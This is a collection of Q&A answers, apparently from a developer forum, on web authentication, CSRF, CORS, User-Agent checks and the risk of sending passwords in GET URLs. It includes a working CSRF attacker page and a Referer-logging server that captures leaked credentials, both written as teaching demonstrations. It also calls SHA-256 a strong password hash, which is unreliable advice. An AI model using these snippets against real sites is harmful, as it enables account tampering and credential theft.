I would like to allow only logged-in users to make POST requests in Liferay, and at the same time deny POST requests from other sources, like Postman, for example.
With the caveat that I am not familiar with Liferay itself, I can tell you that in a general Web application what you are asking is impossible.
Let's consider the problem in its simplest form:
A Web application makes POST requests to a server
The server should allow requests only from a logged-in user using the Web application
The server is stateless - that is, each request must be considered atomically. There is no persistent connection and no state is preserved at the server.
So - let's consider what happens when the browser makes a POST:
An HTTP connection is opened to the server
The HTTP headers are sent, including any site cookies that have previously been set by the server, and special headers like the User Agent and referrer
The form data is posted to the server
The server processes the request and returns a response
How does the server know that the user is logged in? In most cases, this is done by checking a cookie that is sent with the request and verifying that it is correct - cryptographically signed, for instance.
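To illustrate the idea (this is not Liferay's actual session mechanism; the cookie layout and secret are made up), a signed-cookie check might look like this in Node.js:

const crypto = require('crypto');

const SECRET = 'server-side-secret'; // known only to the server

// sign: append an HMAC of the value so the server can detect tampering
function sign(value) {
  return value + '.' + crypto.createHmac('sha256', SECRET).update(value).digest('hex');
}

// verify: recompute the signature and compare; a forged or altered cookie fails
function verify(cookie) {
  const i = cookie.lastIndexOf('.');
  if (i < 0) return null;
  const value = cookie.slice(0, i);
  return sign(value) === cookie ? value : null;
}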
Now let's consider a Postman request. Exactly what is the difference between a request submitted through Postman and one submitted through the browser? None. There is no difference. It is trivially simple to examine and retrieve the cookies sent on a legitimate request from the browser, and include those headers in a faked Postman request.
Let's consider what you might do to prevent this.
1. Set and verify extra cookies - won't work because we can still retrieve those cookies just like we did with the login session
2. Encrypt the connection so the cookies can't be captured over the wire - won't work because I can capture the cookies from the browser
3. Check the User Agent to ensure that it is sent by a browser - won't work because I can spoof the headers to any value I want
4. Check the Referer header to ensure the request came from a valid page on my site (this is part of a Cross-Site Request Forgery mitigation) - won't work because I can always spoof the Referer to any value I want
5. Add logic (JavaScript) into the page to compute some validity token - won't work because I can still read the JavaScript (it's client-side) and fake my own token
By the very nature of the Web system, this problem is insoluble. Because you (the server/application writer) do not have complete control over both sides of the communication, it is always possible to spoof requests from the client. The best you can do is prevent arbitrary requests from arbitrary users who do not have valid credentials. However, any request that includes the correct security tokens must be considered valid, whether it is generated from a browser/web page or crafted by hand or through some other application.

At best, you will needlessly complicate your application for no significant improvement in security. You can prevent CSRF attacks and some other injection-type attacks, but because you as the client can always read whatever is sent from the server and can always craft your own requests, you can always provide a valid request.
Clarification
Can you please explain exactly what you are trying to accomplish? Are you trying to disable guest access completely, even through "valid" referrers (a user actually submitting a form), or are you trying to prevent POST requests coming from other referrers?
If you are just worried about referrer forgeries you can set the following property in your portal-ext.properties file.
auth.token.check.enabled = true
If you want to remove all permissions for the guest role, you can simply go into the portal's control panel, go into Configuration and then into the permissions table, and uncheck the entire row associated with guest.
That should do it. If you can't find those permissions post your exact Liferay version.
Related
I have an API in Next.js (NextAuth.js) that only the frontend will be using. It uses cookies for authentication. My question is: could a malicious website change the user's data using CSRF? Should I implement CSRF tokens, or can I prevent malicious websites from changing the data without them?
If authentication is based on something that the browser sends automatically with requests (like cookies), then yes, you most likely need protection against CSRF.
You can try it yourself: set up a server on one origin (e.g. localhost:3000), and an attacker page on another (e.g. localhost:8080; it's the same as a different domain, controlled by an attacker). Now log in to your app on :3000, and on your attacker origin make a page that will post to :3000 something that changes data. You will see that while :8080 will not receive the response (because of the same-origin policy), :3000 will indeed receive and process the request. It will also receive cookies set for :3000, regardless of where the user is making the request from.
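If you want a concrete starting point, here is a minimal sketch of the attacker side of that experiment (Node.js/Express; the endpoint /api/change-email on :3000 is made up for the example):

const express = require('express');

const attacker = express();
attacker.get('/', (req, res) => {
  // an auto-submitting cross-origin form: the victim's browser attaches
  // its cookies for localhost:3000 even though the page came from :8080
  res.send(
    '<form action="http://localhost:3000/api/change-email" method="POST">' +
    '<input type="hidden" name="email" value="attacker@evil.example">' +
    '</form>' +
    '<script>document.forms[0].submit()</script>'
  );
});
attacker.listen(8080);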
For mitigation, you can implement the synchronizer token pattern (CSRF tokens) or double-submit cookies, or you can decide to rely on the SameSite property of cookies, which is not supported by old browsers but is supported by fairly recent ones, so there is some risk, depending on who your users are.
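For example, setting the session cookie with the SameSite attribute tells the browser not to attach it to cross-site POSTs (a minimal Express sketch; the endpoint, cookie name and token are illustrative):

const express = require('express');
const app = express();

app.post('/api/login', (req, res) => {
  const sessionToken = 'opaque-random-token'; // in reality: a random, server-stored ID
  res.cookie('session', sessionToken, {
    httpOnly: true,   // not readable from page JavaScript
    secure: true,     // only ever sent over HTTPS
    sameSite: 'lax'   // withheld on cross-site POSTs, which defeats the attack above
  });
  res.sendStatus(204);
});

app.listen(3000);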
If I am ideologically opposed to the policies of a certain browser's developers (I think that the browser harms its users), can I somehow block that browser from accessing my website?
I would assume that such a block would have to happen on the backend; the frontend won't help here. But can backend languages such as PHP/Ruby/C++/Python, etc. really help for that purpose?
Your server can look at the User-Agent header in the HTTP request that the client sends to the server (many server-side environments expose it as HTTP_USER_AGENT). This header typically contains information about the user agent that made the request; i.e. if the request originated from a web browser, then the user-agent information will generally contain the vendor and version of the browser. So, your server can respond conditionally based on what the client sends in this header.
See https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent for more info, and for examples of user agent strings for a number of widely used browsers.
However, be aware that the User-Agent header is populated by the client. Therefore, this header cannot be trusted, as it can easily be forged by the client.
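As a sketch of the idea (Node.js/Express here, though the question mentions PHP and others; the substring test is crude and, as noted, trivially spoofed):

const express = require('express');
const app = express();

app.use((req, res, next) => {
  const ua = req.headers['user-agent'] || '';
  // example: turn away one browser family based on its UA string
  // (Chrome's UA contains "Chrome/", while Edge also adds "Edg/")
  if (ua.includes('Chrome/') && !ua.includes('Edg/')) {
    return res.status(403).send('This browser is not welcome here.');
  }
  next();
});

app.get('/', (req, res) => res.send('Hello'));
app.listen(3000);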
I've read an article which used Cors-Anywhere to make an example URL request, and it made me think about how easily the Same Origin Policy can be bypassed.
While the browser prevents you from accessing the error directly, and cancels the request altogether when it doesn't pass a preflight request, a simple Node server does not need to abide by such rules and can be used as a proxy.
All that needs to be done is to prepend 'https://cors-anywhere.herokuapp.com/' to the requested URL in the malicious script and voilà, you don't need to pass CORS.
And as sideshowbarker pointed out, it takes a couple of minutes to deploy your own Cors-Anywhere server.
Doesn't it make SOP as a security measure pretty much pointless?
The purpose of the SOP is to segregate data stored in browsers by their origin. If you got a cookie from domain1.tld (or it stored data for you in a browser store), Javascript on domain2.tld will not be able to gain access. This cannot be circumvented by any server-side component, because that component will still not have access in any way. If there was no SOP, a malicious site could just read any data stored by other websites in your browsers.
Now this is also related to CORS, as you somewhat correctly pointed out. Normally, your browser will not receive the response from a javascript request made to a different origin than the page origin it's running on. The purpose of this is that if it worked, you could gain information from sites where the user is logged in. If you send it through Cors-Anywhere though, you will not be able to send the user's session cookie for the other site, because you still don't have access, the request goes to your own server as the proxy.
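To make that last point concrete, a bare-bones proxy in the spirit of Cors-Anywhere could look like this (a Node.js/Express sketch assuming the node-fetch package; names are illustrative). Note that it can only forward what the caller gives it; the victim's session cookies for the target site never reach it:

const express = require('express');
const fetch = require('node-fetch');

const app = express();
app.get('/proxy', async (req, res) => {
  const target = req.query.url;                 // e.g. /proxy?url=https://api.example.com/data
  const upstream = await fetch(target);         // no third-party session cookies are attached here
  res.set('Access-Control-Allow-Origin', '*');  // add the CORS header the target refused to send
  res.send(await upstream.text());
});
app.listen(8081);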
Where Cors-Anywhere matters is unauthenticated APIs. Some APIs might check the origin header and only respond to their own client domain. In that case, sure, Cors-Anywhere can add or change CORS headers so that you can query it from your own hosted client. But the purpose of SOP is not to prevent this, and even in this case, it would be a lot easier for the API owner to blacklist or throttle your requests, because they are all proxied by your server.
So in short, SOP and CORS are not access-control mechanisms in the sense I think you meant. Their purpose is to prevent and/or securely allow cross-origin requests to certain resources, but they are not meant to, for example, prevent server-side components from making any request, or to try to authenticate your client-side JavaScript itself (which is not technically possible).
We have a web page which uses the SAPUI5 framework to build a SPA. The communication between the browser and the server uses HTTPS. The interaction to log into the page is the following:
The user opens the website by entering https://myserver.com in the browser
A login dialogue with two form fields for username and password is shown.
After entering username and password and pressing the login button,
an AJAX request is sent using GET to the URL: https://myusername:myPassword@myserver.com/foo/bar/metadata
According to my understanding, using GET to send sensitive data is never a good idea. But this answer to "HTTPS - is the URL string secure?" says the following:
HTTPS establishes an underlying SSL connection before any HTTP data is transferred. This ensures that all URL data (with the exception of hostname, which is used to establish the connection) is carried solely within this encrypted connection and is protected from man-in-the-middle attacks in the same way that any HTTPS data is.
And in another answer in the same thread:
These fields [for example form field, query strings] are stripped off of the URL when creating the routing information in the https packaging process by the browser and are included in the encrypted data block. The page data (form, text, and query string) are passed in the encrypted block after the encryption methods are determined and the handshake completes.
But it seems that there still might be security concerns when using GET:
the URL is stored in the logs on the server
and, raised in the same thread: leakage through the browser history
Is this the case for URLs like these?
https://myusername:myPassword@myserver.com/foo/bar/metadata
// or
https://myserver.com/?user=myUsername&pass=MyPasswort
Additional questions on this topic:
Is passing get variables over ssl secure
Is sending a password in json over https considered secure
How to send securely passwords via GET/POST?
On security.stackexchange there is additional information:
can urls be sniffed when using ssl
ssl with get and post
But in my opinion a few aspects are still not answered.
Question
In my opinion the points mentioned above are valid objections to using GET. Is that the case; is using GET for sending passwords a bad idea?
Are these all of the attack options, or are there more?
browser history
server logs (assuming that the URL is stored in the logs, encrypted or not)
referer information (if this is really the case)
Which attack options do exist when sending sensitive data (password) over https using get?
Thanks
Sending any kind of sensitive data over GET is dangerous, even if it is HTTPS. This data might end up in log files at the server and will be included in the Referer header in links to, or includes from, other sites. It will also be saved in the history of the browser, so an attacker might try to guess and verify the original contents of the link with an attack against the history.
Apart from that, you'd better ask that kind of question at security.stackexchange.com.
These two approaches are fundamentally different:
https://myusername:myPassword@myserver.com/foo/bar/metadata
https://myserver.com/?user=myUsername&pass=MyPasswort
myusername:myPassword@ is the "User Information" (this form is actually deprecated in the latest URI RFC), whereas ?user=myUsername&pass=MyPasswort is part of the query.
If you look at this example from RFC 3986:
foo://example.com:8042/over/there?name=ferret#nose
\_/   \______________/\_________/ \_________/ \__/
 |           |            |            |        |
scheme     authority       path        query   fragment
 |   _____________________|__
/ \ /                        \
urn:example:animal:ferret:nose
myusername:myPassword@ is part of the authority. In practice, HTTP (Basic) authentication headers will generally be used to convey this information. On the server side, headers are generally not logged (and if they are, whether the client entered them into their location bar or via an input dialog would make no difference). In general (although it's implementation-dependent), browsers don't store it in the location bar, or at least they remove the password. It appears that Firefox keeps the userinfo in the browser history, while Chrome doesn't (and IE doesn't really support it without workarounds).
In contrast, ?user=myUsername&pass=MyPasswort is the query, a much more integral part of the URI, and it is sent as part of the HTTP Request-URI. This will be in the browser's history and the server's logs. This will also be passed in the Referer header.
To put it simply, myusername:myPassword@ is clearly designed to convey information that is potentially sensitive, and browsers are generally designed to handle this appropriately, whereas browsers can't guess which part of which queries are sensitive and which are not: expect information leakage there.
The referrer information will also generally not leak to third parties, since the Referer header coming from an HTTPS page is normally only sent with other requests on HTTPS to the same host. (Of course, if you have used https://myserver.com/?user=myUsername&pass=MyPasswort, this will be in the logs of that same host, but you're not making it much worse, since it stays in the same server's logs.)
This is specified in the HTTP specification (Section 15.1.3):
Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol.
Although it is just a "SHOULD NOT", Internet Explorer, Chrome and Firefox seem to implement it this way. Whether this applies to HTTPS requests from one host to another depends on the browser and its version.
It is now possible to override this behaviour, as described in this question and this draft specification, using a <meta name="referrer"> tag, but you wouldn't do that on a sensitive page that uses ?user=myUsername&pass=MyPasswort anyway.
Note that the rest of the HTTP specification (Section 15.1.3) is also relevant:
Authors of services which use the HTTP protocol SHOULD NOT use GET based forms for the submission of sensitive data, because this will cause this data to be encoded in the Request-URI. Many existing servers, proxies, and user agents will log the request URI in some place where it might be visible to third parties. Servers can use POST-based form submission instead
Using ?user=myUsername&pass=MyPasswort is exactly like using a GET based form and, while the Referer issue can be contained, the problems regarding logs and history remain.
Let's assume that a user clicked a button and the following request was generated by the client browser.
https://www.site.com/?username=alice&password=b0b123!
HTTPS
First things first: HTTPS is not related to this topic, because using POST or GET does not matter from the attacker's perspective. When traffic is plain HTTP, attackers can easily grab sensitive data from the query string and from the POST request body alike. Therefore it makes no difference.
Server Logs
We know that Apache, Nginx and other servers log every single HTTP request to a log file, which means the query string ( ?username=alice&password=b0b123! ) is going to be written into the log files. This can be dangerous, because your system administrator can access this data too and grab all user credentials. Another case arises when your application server is compromised. I assume you are storing passwords hashed; if you use a strong hashing algorithm like SHA-256, your clients' passwords will be more secure against hackers. But attackers who can access the log files can directly get the passwords as plain text with very basic shell scripts.
Referer Information
We assumed that the client opened the above link. When the client browser receives the HTML content and parses it, it will see the image tags. These images can be hosted outside of your domain (postimage or similar services, or directly a domain under the attacker's control). The browser makes an HTTP request in order to fetch each image, but the current URL, https://www.site.com/?username=alice&password=b0b123!, is going to be sent as the Referer information!
That means alice and her password will be passed to another domain and will be accessible directly from its web logs. This is a really important security issue.
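To see the leak in action, the attacker's image host only has to log the Referer header (a Node.js/Express sketch; the attacker's domain and image path are made up):

const express = require('express');
const app = express();

app.get('/pixel.gif', (req, res) => {
  // for the scenario above this prints:
  // Referer: https://www.site.com/?username=alice&password=b0b123!
  console.log('Referer:', req.headers['referer']);
  res.sendStatus(204); // no content; the "image" does not even need to exist
});

app.listen(8080);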
This topic reminds me of Session Fixation vulnerabilities. Please read the following OWASP article about an almost identical security flaw involving sessions: https://www.owasp.org/index.php/Session_fixation . It's worth reading.
The community has provided a broad view on the considerations, and the above stands with respect to the question. However, GET requests may, in general, need authentication. As observed above, sending username/password as part of the URL is never correct; however, that is typically not the way authentication information is usually handled. When a request for a resource is sent to the server, the server generally responds with a 401 and a WWW-Authenticate header in the response, against which the client sends an Authorization header with the authentication information (in the Basic scheme). Now, this second request from the client can be a POST or a GET request; nothing prevents that. So, generally, it is not the request type but the mode of communicating the information that is in question.
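To illustrate that exchange (the credentials here are the placeholder user:pass, Base64-encoded as the Basic scheme prescribes):

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="example"

GET /resource HTTP/1.1
Authorization: Basic dXNlcjpwYXNz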
Refer to http://en.wikipedia.org/wiki/Basic_access_authentication
Consider this:
https://www.example.com/login
Javascript within login page:
$.getJSON("/login?user=joeblow&pass=securepassword123");
What would the referer be now?
If you're concerned about security, an extra layer could be:
var a = btoa(user + ':' + pass); // btoa is the browser's built-in Base64 encoder
$.getJSON("/login?a=" + a);
Although not encrypted, at least the data is obscured from plain sight (Base64 is trivially reversible, so this is obfuscation, not security).
I wish to use my Stellaris LM3S8962 microcontroller as a bridge between internet and a bunch of sensors. I will be using Zigbee nodes for communication from the sensors to the microcontroller. I have been able to use the lwIP TCP/IP stack (for LM3S8962) to access HTML pages stored in the controller's flash.
Now, I want to add a secure login system for the same. What I basically want is that - when I enter the IP of the controller in the browser, it should prompt me for a username and a password. I want to make this system as secure as possible using the lwIP TCP/IP stack.
FYI, the stack does not support PHP or any other scripts. CGI feature (in C) is supported but I don't know how to implement the security part. Please guide.
There are basically two ways you could implement user authentication over HTTP on your platform:
"classic" Basic HTTP authentication (see RFC2616 for exact specification),
a login form, creating a session ID, and returning that to the browser, to be stored either in a cookie, or in the URL.
Basic HTTP authentication works by you inserting a check into your web page serving routine, to see if there is an Authorization HTTP header. If there is, you should decode it (see the RFC), and check the specified username/password. If the credentials are ok, then proceed with the web page serving. If the credentials are incorrect, or in case there is no Authorization header, you should return a 401 error code. The browser will then prompt the user for the credentials. This solution is rather simple, and you'll get the browser login dialog, not a nice HTML page. Also, the microcontroller will have to check the credentials for every page request.
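On lwIP this check would live in your C request handler, but the flow is easy to show with a minimal Node.js sketch (the credentials, realm and port are placeholders):

const express = require('express');
const app = express();

app.use((req, res, next) => {
  const header = req.headers['authorization'] || '';
  const expected = 'Basic ' + Buffer.from('admin:secret').toString('base64');
  if (header !== expected) {
    // missing or wrong credentials: a 401 makes the browser show its login dialog
    res.set('WWW-Authenticate', 'Basic realm="sensors"');
    return res.status(401).send('Authentication required');
  }
  next(); // credentials ok: proceed with serving the page
});

app.get('/', (req, res) => res.send('Sensor dashboard'));
app.listen(8080);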
Authentication via a login form works by your server maintaining a list of properly authenticated user sessions (probably in memory), and checking the request against this list. Upon logging in, a unique, random ID should be generated for that session, and the session data should be entered into your list. The new session ID should be returned to the browser to be included in upcoming HTTP requests. You may choose the session ID to be put into a browser cookie, or you can embed it into the URL as a URL parameter (?id=xxxxx). The URL parameter is embedded by sending a 302 Redirection response to the browser with the new URL; if you want the cookie solution, you can send the response to the login request with a Set-Cookie HTTP response header.

In the login form solution, the actual credentials (username/password) are only checked once, at login. After that, only the session ID is checked against the list of active sessions. The session ID has to be extracted from the requests for every web page served (from the URL, or from the Cookie HTTP header). Also, you'll have to implement some kind of session timeout, both as a security measure and to put bounds on the size of the list of active sessions.
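The bookkeeping for that second approach fits in a few lines (again a Node.js sketch of the logic you would port to C; the 10-minute timeout is arbitrary):

const crypto = require('crypto');

const sessions = new Map(); // session ID -> { user, expires }

function login(user) {
  const id = crypto.randomBytes(16).toString('hex'); // unique, random session ID
  sessions.set(id, { user, expires: Date.now() + 10 * 60 * 1000 });
  return id; // hand back via Set-Cookie, or embed as ?id=... in a 302 redirect
}

function checkSession(id) {
  const s = sessions.get(id);
  if (!s || s.expires < Date.now()) {
    sessions.delete(id); // enforce the timeout and bound the list size
    return null;
  }
  return s.user;
}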
Now comes the harder part: in both solutions, the username/password travels in some requests (in every request for Basic HTTP authentication, and in the login page POST for the login form solution), and can be extracted from the network traffic. Also, information necessary to hijack the session is present in every request in both solutions. If this is a problem (the system works on a freely accessible LAN segment, or over network links beyond your control), you'll probably need SSL to hide this sensitive data. How to get a reasonable SSL implementation for your platform, that's another question.